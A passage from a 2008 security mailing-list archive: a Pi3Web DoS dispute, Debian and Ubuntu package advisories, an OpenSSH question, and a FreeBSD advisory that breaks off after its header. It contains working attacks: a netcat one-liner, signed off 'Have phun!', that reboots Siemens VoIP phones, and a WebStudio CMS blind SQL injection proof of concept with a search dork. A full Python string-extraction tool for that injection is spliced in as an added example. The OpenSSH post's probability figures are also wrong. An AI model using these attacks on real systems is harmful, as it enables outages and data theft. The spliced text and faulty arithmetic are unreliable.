Re: Re: Wrong report: BID 32287, Pi3Web ISAPI DoS vulnerability

2008-11-24 Thread zimpel
Still wrong, no DoS. The server responds to further requests after the dialog
box appears:

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /isapi/users.txt HTTP/1.1" 500 339

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:17:51 +0100] "GET /favicon.ico HTTP/1.1" 200 973

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET / HTTP/1.1" 200 2559

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web_earth3.gif HTTP/1.1" 200 3811

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Web.ico HTTP/1.1" 200 973

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/red_ball.gif HTTP/1.1" 200 397

192.168.1.5 hz.t-online.de - [24/Nov/2008:22:18:26 +0100] "GET /icons/Pi3Tile.gif HTTP/1.1" 200 1866



Some explanation:

In desktop mode the application is interactive, but when installed as a system 
service it isn't.



Of course the preferred installation for a production server is a system
service. On the other hand, the (interactive) desktop application is the choice
for web application development.



Finally the ISAPI example (!!!) files can be deleted or a simple filter in the 
server configuration can be used in order to hide these files:



1.) either extend the mapping directive:

Mapping Condition="&or(&regexp('*.dll*',$U),&regexp('*.dll',$f))" ISAPIMapper From="/isapi/" To="Isapi\"



or 2.) extend the ISAPI handler object:

CheckPath Condition="&not(&or(&regexp('*.dll*',$U),&regexp('*.dll',$f)))" StatusCode StatusCode="404"



Both filters return an HTTP status 404 for the example URL http://hz/isapi/users.txt.



This is simple configuration work as described in the server documentation. So 
what? I still cannot see any reason for a DoS vulnerability in this case.



Honestly, I don't believe that someone publishes the ISAPI (or CGI) examples 
delivered and installed with the server in an internet environment. The default 
configuration template for internet is internet.pi3 and this is of course 
without ISAPI mapping per default.



Finally, there's still the fact that wrong (server version) and incomplete
(installation options, OS version) information has been posted without giving
me the chance for analysis. I'm the only person in the Pi3Web project and I do
this in my rare spare time (normally at the weekend).

--

regards,

Holger Zimmermann



Siemens C450IP/C475IP DoS

2008-11-24 Thread Martin Kluge
Hi,

echo -e "X sip:s X\nFrom:\nTo:\n" | nc -q0 -u  5060

Will disconnect all current VOIP and PSTN calls and reboot
the C450IP/C475IP devices.

Tested with current firmwares.

Vendor (Siemens) was contacted 11/2007, no fix supplied yet.

Have phun!

sky & Any



WebStudio CMS 'pageid' Blind SQL Injection

2008-11-24 Thread glafkos
Application:  WebStudio CMS

Vendor Name: BDigital Media Ltd

Vendors Url:  http://www.bdigital.biz

Bug Type: WebStudio CMS (pageid) Blind SQL Injection Vulnerability

Exploitation: Remote

Severity: Critical

Solution Status: Unpatched 

Introduction: WebStudio CMS is a modular Web Content Management System solution.

Google Dork:  "Powered by WebStudio"


Description:

WebStudio CMS is prone to an SQL-injection vulnerability because it fails to 
sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, 
access or modify data, or exploit latent vulnerabilities in the underlying 
database.

PoC:

http://localhost/index.php?pageid=1+and+1=1 ( TRUE  )

http://localhost/index.php?pageid=1+and+1=2 ( FALSE )

Exploit:
 
http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE  )

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )

Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly sanitised.


Credits:

Charalambous Glafkos
Email:  glafkos (at) astalavista (dot) com
___
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net
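The PoC above asks one yes/no question per request (TRUE page vs. FALSE page) and guesses a single digit of @@version. The following is an added example, not part of glafkos' post and not WebStudio CMS code: it generalises that boolean oracle into a full string-extraction routine, run here against a constructed SQLite stand-in for a concatenating index.php, and sets the hardened, parameterised handler beside it so the same attack can be seen failing. The table names, the 'admin' row and the secret value are all constructed sample data; the SQL uses SQLite spellings (unicode/substr) where the original PoC used MySQL's substring.

```python
"""Boolean-based blind SQL injection, generalised from the 'pageid' PoC above.
Added example, not part of the original post or of WebStudio CMS: the page
handler is a constructed SQLite stand-in for a concatenating index.php."""
import sqlite3
from typing import Callable

# Constructed sample data standing in for the CMS database.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);
    INSERT INTO pages VALUES (1, 'Home');
    CREATE TABLE users (name TEXT, pw TEXT);
    INSERT INTO users VALUES ('admin', 's3cret');
""")


def vulnerable_page(pageid: str) -> bool:
    """Models the flaw in the PoC: pageid is concatenated into the query.
    True means the page rendered (the PoC's 'TRUE'), False means no row or
    an SQL error (the PoC's 'FALSE')."""
    sql = "SELECT title FROM pages WHERE id=" + pageid      # the injection point
    try:
        return _conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def hardened_page(pageid: str) -> bool:
    """Fix: validate the type and bind the value, so the payload can never
    become SQL syntax."""
    try:
        pid = int(pageid)
    except ValueError:
        return False
    row = _conn.execute("SELECT title FROM pages WHERE id=?", (pid,)).fetchone()
    return row is not None


def oracle(page: Callable[[str], bool], condition: str) -> bool:
    """One yes/no question, i.e. ?pageid=1+and+(<condition>)."""
    return page("1 and (" + condition + ")")


def extract(page: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Recover the string value of an SQL expression through the oracle alone.
    The PoC guesses one digit of @@version; this does the general thing: a
    binary search over printable ASCII per character (7 requests per byte
    instead of up to 95).  SQLite spellings are used (unicode/substr); MySQL
    would be ascii/substring."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(page, f"length({expr}) >= {pos}"):
            break                                  # string exhausted
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(page, f"unicode(substr({expr},{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    target = "(SELECT pw FROM users WHERE name='admin')"
    print("vulnerable:", repr(extract(vulnerable_page, target)))   # 's3cret'
    print("hardened:  ", repr(extract(hardened_page, target)))     # ''
```

Against the vulnerable handler the loop recovers the whole secret with about seven requests per character, which is why a "blind" injection is rated as seriously as one that echoes query output. Against the hardened handler the very first length probe fails, because the payload never reaches the parser as SQL.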


[SECURITY] [DSA 1671-1] New iceweasel packages fix several vulnerabilities

2008-11-24 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1671-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 24, 2008 http://www.debian.org/security/faq
- 

Package: iceweasel
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2008-0017 CVE-2008-4582 CVE-2008-5012 CVE-2008-5013 
CVE-2008-5014 CVE-2008-5017 CVE-2008-5018 CVE-2008-5021 CVE-2008-5022 
CVE-2008-5023 CVE-2008-5024

Several remote vulnerabilities have been discovered in the Iceweasel
webbrowser, an unbranded version of the Firefox browser. The Common 
Vulnerabilities and Exposures project identifies the following problems:

CVE-2008-0017
   
   Justin Schuh discovered that a buffer overflow in the http-index-format
   parser could lead to arbitrary code execution.

CVE-2008-4582

   Liu Die Yu discovered an information leak through local shortcut
   files.

CVE-2008-5012

   Georgi Guninski, Michal Zalewski and Chris Evans discovered that
   the canvas element could be used to bypass same-origin
   restrictions.

CVE-2008-5013

   It was discovered that insufficient checks in the Flash plugin glue
   code could lead to arbitrary code execution.

CVE-2008-5014

   Jesse Ruderman discovered that a programming error in the
   window.__proto__.__proto__ object could lead to arbitrary code
   execution.

CVE-2008-5017

   It was discovered that crashes in the layout engine could lead to
   arbitrary code execution.

CVE-2008-5018

   It was discovered that crashes in the Javascript engine could lead to
   arbitrary code execution.

CVE-2008-5021

   It was discovered that a crash in the nsFrameManager might lead to
   the execution of arbitrary code.

CVE-2008-5022

   "moz_bug_r_a4" discovered that the same-origin check in
   nsXMLHttpRequest::NotifyEventListeners() could be bypassed.

CVE-2008-5023

   Collin Jackson discovered that the -moz-binding property bypasses
   security checks on codebase principals.

CVE-2008-5024

   Chris Evans discovered that quote characters were improperly
   escaped in the default namespace of E4X documents.

For the stable distribution (etch), these problems have been fixed in
version 2.0.0.18-0etch1.

For the upcoming stable distribution (lenny) and the unstable distribution
(sid), these problems have been fixed in version 3.0.4-1 of iceweasel 
and version 1.9.0.4-1 of xulrunner. Packages for arm and mips will be
provided soon.

We recommend that you upgrade your iceweasel package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.18-0etch1.diff.gz
Size/MD5 checksum:   186777 18d2492164c72b846fab74bd75a69e1b
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.18.orig.tar.gz
Size/MD5 checksum: 47266681 ad1a208d95dedeafddbe7377de88d4d9
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel_2.0.0.18-0etch1.dsc
Size/MD5 checksum: 1289 84983c4e7f053c1f0eb3ea3d154bc6ad

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-gnome-support_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:54478 73ed36d6990d6b86e8fccef00a9029b1
  
http://security.debian.org/pool/updates/main/i/iceweasel/firefox-dom-inspector_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:54626 bcc4bd1443fe23e5311396949bac9f32
  
http://security.debian.org/pool/updates/main/i/iceweasel/firefox-gnome-support_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:54596 62200645f81cd0e505fd40382333d010
  
http://security.debian.org/pool/updates/main/i/iceweasel/firefox_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:54742 045a9714ca0a04061cee79bc16b4b940
  
http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:55274 09fdae147e16b09ad51544ab1fd218e6
  
http://security.debian.org/pool/updates/main/i/iceweasel/iceweasel-dom-inspector_2.0.0.18-0etch1_all.deb
Size/MD5 checksum:   239810 b1e8cab02ec9a70d89df8db4610b
  
http://security.debian.org/pool/updates/main/i/iceweasel/mozilla-firefox-dom-inspector_2.0.0.18

[SECURITY] [DSA 1670-1] New enscript packages fix arbitrary code execution

2008-11-24 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1670-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 24, 2008 http://www.debian.org/security/faq
- 

Package: enscript
Vulnerability  : buffer overflows
Problem type   : local(remote)
Debian-specific: no
CVE Id(s)  : CVE-2008-3863 CVE-2008-4306

Several vulnerabilities have been discovered in Enscript, a converter
from ASCII text to Postscript, HTML or RTF. The Common Vulnerabilities
and Exposures project identifies the following problems:

CVE-2008-3863

   Ulf Harnhammer discovered that a buffer overflow may lead to
   the execution of arbitrary code.

CVE-2008-4306

   Kees Cook and Tomas Hoger discovered that several buffer
   overflows may lead to the execution of arbitrary code.

For the stable distribution (etch), these problems have been fixed in
version 1.6.4-11.1.

For the upcoming stable distribution (lenny) and the unstable
distribution (sid), these problems have been fixed in version 1.6.4-13.

We recommend that you upgrade your enscript package.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1.diff.gz
Size/MD5 checksum:91162 87e85119b278fa214b29f84eda3944a4
  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4.orig.tar.gz
Size/MD5 checksum:  1036734 b5174b59e4a050fb462af5dbf28ebba3
  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1.dsc
Size/MD5 checksum:  631 b5e8009c5ef20c0bf2089e3c43881daf

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_alpha.deb
Size/MD5 checksum:   538656 0de0747ee0addb4b63049fe3094075c0

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_amd64.deb
Size/MD5 checksum:   536032 76e2edd41d8d4a9ba6e452b8e1bd9843

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_arm.deb
Size/MD5 checksum:   521436 b3caa29eb9859b77b8856a25b33693a1

hppa architecture (HP PA RISC)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_hppa.deb
Size/MD5 checksum:   538552 01d9da109510c141db40f1136599c70f

i386 architecture (Intel ia32)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_i386.deb
Size/MD5 checksum:   487696 a2d60b314df3903c55d427f6c30aa0b4

ia64 architecture (Intel ia64)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_ia64.deb
Size/MD5 checksum:   549196 c072896a844917e6e60c086ed9ba71b2

mips architecture (MIPS (Big Endian))

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_mips.deb
Size/MD5 checksum:   533542 bd6b349e56a67a4a41bd59caf9786d69

mipsel architecture (MIPS (Little Endian))

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_mipsel.deb
Size/MD5 checksum:   501374 55ccfa56d3d38aabfdaad26fd2657a55

powerpc architecture (PowerPC)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_powerpc.deb
Size/MD5 checksum:   495706 c3b4cd868ec170ec4a54a0bf9d3a120c

s390 architecture (IBM S/390)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_s390.deb
Size/MD5 checksum:   494972 4463a8cba45134de9358e4b2895258a7

sparc architecture (Sun SPARC/UltraSPARC)

  
http://security.debian.org/pool/updates/main/e/enscript/enscript_1.6.4-11.1_sparc.deb
Size/MD5 checksum:   523362 edcacb33c1b597c5d5c61a40947c893b

  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show ' and http://packages.debian.org/
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEARECAAYFAkkrFdUACgkQ

[USN-674-2] HPLIP vulnerabilities

2008-11-24 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-674-2  November 24, 2008
hplip vulnerabilities
CVE-2008-2940, CVE-2008-2941
===

A security issue affects the following Ubuntu releases:

Ubuntu 7.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 7.10:
  hplip   2.7.7.dfsg.1-0ubuntu5.2

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-674-1 provided packages to fix vulnerabilities in HPLIP. Due to an
internal archive problem, the updates for Ubuntu 7.10 would not install
properly. This update provides fixed packages for Ubuntu 7.10.

We apologize for the inconvenience.

Original advisory details:

 It was discovered that the hpssd tool of hplip did not validate
 privileges in the alert-mailing function. A local attacker could
 exploit this to gain privileges and send e-mail messages from the
 account of the hplip user. This update alters hplip behaviour by
 preventing users from setting alerts and by moving alert configuration
 to a root-controlled /etc/hp/alerts.conf file. (CVE-2008-2940)
 
 It was discovered that the hpssd tool of hplip did not correctly
 handle certain commands. A local attacker could use a specially
 crafted packet to crash hpssd, leading to a denial of service.
 (CVE-2008-2941)


Updated packages for Ubuntu 7.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2.diff.gz
  Size/MD5:   149554 6d12457a4229b6d002bbf454ce4c4479

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2.dsc
  Size/MD5: 1064 d013f46bd4a1076ca4bd131c3b6dfcdd

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1.orig.tar.gz
  Size/MD5: 14361049 ae5165d46413db8119979f5b3345f7a5

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-data_2.7.7.dfsg.1-0ubuntu5.2_all.deb
  Size/MD5:  6897802 4ba89cf27c4bd07221f4cf1005d406f0

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-doc_2.7.7.dfsg.1-0ubuntu5.2_all.deb
  Size/MD5:  4146742 e8dc40c3159dee1a97322811003e030c

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-gui_2.7.7.dfsg.1-0ubuntu5.2_all.deb
  Size/MD5:   117516 0ee5f6a832179e244e06e42d67e6b104

http://security.ubuntu.com/ubuntu/pool/universe/h/hplip/hpijs-ppds_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_all.deb
  Size/MD5:   479914 dc684661485f3bb17b23f244e065

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_amd64.deb
  Size/MD5:   341462 80a265e7d17338267b3feff153146444

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.2_amd64.deb
  Size/MD5:   769972 712dad65b22a926810c3a8388af52371

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2_amd64.deb
  Size/MD5:   302956 43eb75455ec39ec0c785003b937d3459

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_i386.deb
  Size/MD5:   334572 592adfe9165494b41fbdbb62f73fb404

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.2_i386.deb
  Size/MD5:   747180 19dca187611ca2127d429ca3b64123b8

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2_i386.deb
  Size/MD5:   290338 d8103797df2cad750c5e5c7fae9db381

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_lpia.deb
  Size/MD5:   337692 8a49f0e3e5a9a89c6f49433bda5755e0

http://ports.ubuntu.com/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.2_lpia.deb
  Size/MD5:   925962 1c080bc69bedda6bd6458e379b6d3b30

http://ports.ubuntu.com/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2_lpia.deb
  Size/MD5:   290178 a8348d5941be54a2d3893929d1bc177b

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_powerpc.deb
  Size/MD5:   348146 83a03c118807e46998288302d2d965d3

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip-dbg_2.7.7.dfsg.1-0ubuntu5.2_powerpc.deb
  Size/MD5:   784404 6270645190e1107f379565735f7c7da4

http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hplip_2.7.7.dfsg.1-0ubuntu5.2_powerpc.deb
  Size/MD5:   319076 952865096e5ef1770024e2c8f66167f6

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/h/hplip/hpijs_2.7.7+2.7.7.dfsg.1-0ubuntu5.2_sparc.deb
  Size/MD5:   332600 3f08413ca8e

[USN-675-2] Gaim vulnerability

2008-11-24 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-675-2  November 24, 2008
gaim vulnerability
CVE-2008-2927
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  gaim1:1.5.0+1.5.1cvs20051015-1ubuntu10.1

After a standard system upgrade you need to restart Gaim to effect
the necessary changes.

Details follow:

It was discovered that Gaim did not properly handle certain malformed
messages in the MSN protocol handler. A remote attacker could send a specially
crafted message and possibly execute arbitrary code with user privileges.
(CVE-2008-2927)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1.diff.gz
  Size/MD5:34051 dde2b4483bc14d671228c8a512c9fd0c

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1.dsc
  Size/MD5: 1061 0293c5a43587d3db41a2437da5254206

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015.orig.tar.gz
  Size/MD5:  4299145 949ae755e9be1af68eef6c09c36a7530

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-data_1.5.0+1.5.1cvs20051015-1ubuntu10.1_all.deb
  Size/MD5:   613282 4b5fd4fd6053473bf10db0634e993af0

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.1_amd64.deb
  Size/MD5:   103266 05b0562cf37fb5c72063566134aa7369

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1_amd64.deb
  Size/MD5:   954258 7da66022c5ea3372d097f3f7404610f2

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.1_i386.deb
  Size/MD5:   103248 81eebc45938e22bae57d3278682eee4b

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1_i386.deb
  Size/MD5:   836378 82ecc0d267bb90f7669786ea2092cb93

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.1_powerpc.deb
  Size/MD5:   103256 0fba1bcef36f3b6369effaf634c1a1df

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1_powerpc.deb
  Size/MD5:   924628 5f2721e0fcbaf536e4bcbd7a74a6b06e

  sparc architecture (Sun SPARC/UltraSPARC):


http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim-dev_1.5.0+1.5.1cvs20051015-1ubuntu10.1_sparc.deb
  Size/MD5:   103250 e43bfb56d37e3617b7bee0644c3948a8

http://security.ubuntu.com/ubuntu/pool/main/g/gaim/gaim_1.5.0+1.5.1cvs20051015-1ubuntu10.1_sparc.deb
  Size/MD5:   856760 66a004eff69e42183c6c58d732761b86




signature.asc
Description: This is a digitally signed message part


[USN-676-1] WebKit vulnerability

2008-11-24 Thread Marc Deslauriers
===
Ubuntu Security Notice USN-676-1  November 24, 2008
webkit vulnerability
CVE-2008-3632
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  libwebkit-1.0-1 1.0.1-2ubuntu0.1

After a standard system upgrade you need to restart any applications that
use WebKit, such as Epiphany-webkit and Midori, to effect the necessary
changes.

Details follow:

It was discovered that WebKit did not properly handle Cascading Style Sheets
(CSS) import statements. If a user were tricked into opening a malicious
website, an attacker could cause a browser crash and possibly execute
arbitrary code with user privileges.


Updated packages for Ubuntu 8.10:

  Source archives:


http://security.ubuntu.com/ubuntu/pool/main/w/webkit/webkit_1.0.1-2ubuntu0.1.diff.gz
  Size/MD5:21219 e7f04089c687141f512cb5066d1a1c30

http://security.ubuntu.com/ubuntu/pool/main/w/webkit/webkit_1.0.1-2ubuntu0.1.dsc
  Size/MD5: 1538 23427df68878b3540e082d778cf74ed2

http://security.ubuntu.com/ubuntu/pool/main/w/webkit/webkit_1.0.1.orig.tar.gz
  Size/MD5: 13418752 4de68a5773998bea14e8939aa341c466

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-dev_1.0.1-2ubuntu0.1_all.deb
  Size/MD5:33888 3d3e394977eb1a52a81694786831075b

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_amd64.deb
  Size/MD5: 62588488 b87a1a306e88f330a034de2374f08998

http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_amd64.deb
  Size/MD5:  3498192 08f5383449a42b900a7a541a50f309d7

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_i386.deb
  Size/MD5: 62196494 3b3c6e6c871e45ebda20daeb377c261b

http://security.ubuntu.com/ubuntu/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_i386.deb
  Size/MD5:  3012354 f1528e6e6dedd94de7cf80bc8cf00c83

  lpia architecture (Low Power Intel Architecture):


http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_lpia.deb
  Size/MD5: 62283008 74002deca41e5eb530475b1b8162948c

http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_lpia.deb
  Size/MD5:  2965064 a7e3b539e899ad5b1fae915f9da5fce2

  powerpc architecture (Apple Macintosh G3/G4/G5):


http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_powerpc.deb
  Size/MD5: 64792472 dcaf2d61a355ef62a6bdc423aa68bbe2

http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_powerpc.deb
  Size/MD5:  3291430 50b79b1e9dfd831cd4fb3ffeb6342ec8

  sparc architecture (Sun SPARC/UltraSPARC):


http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1-dbg_1.0.1-2ubuntu0.1_sparc.deb
  Size/MD5: 63702930 9a411dc78d88cdeadf1e105eafa84b31

http://ports.ubuntu.com/pool/main/w/webkit/libwebkit-1.0-1_1.0.1-2ubuntu0.1_sparc.deb
  Size/MD5:  3495810 b945ea2113760479bdc8be11aafe0272




signature.asc
Description: This is a digitally signed message part


Re: OpenSSH security advisory: cbc.adv

2008-11-24 Thread Nick Boyce
[ahem] ... Sorry to be dumb, but ...

On Fri, Nov 21, 2008 at 10:19 AM, Damien Miller <[EMAIL PROTECTED]> wrote:

> Based on the description contained in the CPNI report and a slightly
> more detailed description forwarded by CERT this issue appears to be
> substantially similar to a known weakness in the SSH binary packet
> protocol first described in 2002 by Bellare, Kohno and Namprempre[2].
> The new component seems to be an attack that can recover 14 bits of
> plaintext with a success probability of 2^-14

Could someone please help the uncomprehending [i.e. me :-)] understand
why or whether this is anything to be worried about at all ?

Quick calculator session :
2^(-18) = 0.03814697265625
2^(-14) = 0.6103515625

So there is a vanishingly small probability that a Bad Guy may
discover less than 2 characters from my command-line, every time they
try this attack.  And each time they fail, my connection gets rudely
chopped.  Two characters won't help them much.  They'd need to succeed
about ten times per typed command-line to snoop on most of my
sessions.  This weakness is surely of no conceivable use to a Bad Guy
?

What am I missing ?
Is this something to do with subsequently using those characters in a
known plaintext attack, or recovering a significant fraction of a
shortish typed password, or what ?

> The usage pattern where the attack is most likely to succeed is where an
> automated connection is configured to retry indefinitely in the event of
> errors. In this case, it might be possible to recover as much as 14 bits
> of plaintext per hour (assuming a very fast 10 connections per second).
> Implementing a limit on the number of connection retries (e.g. 256) is
> sufficient to render the attack infeasible for this case.

Given the amount of data pumped down the typical automated connection
per hour, this is hardly anything to worry about .. surely ?

Cheers
Nick Boyce
-- 
"We make money the old-fashioned way: we EARN it"


FreeBSD Security Advisory FreeBSD-SA-08:11.arc4random

2008-11-24 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

=
FreeBSD-SA-08.11.arc4random Security Advisory
  The FreeBSD Project

Topic:  arc4random(9) predictable sequence vulnerability

Category:   core
Module: sys
Announced:  2008-11-24
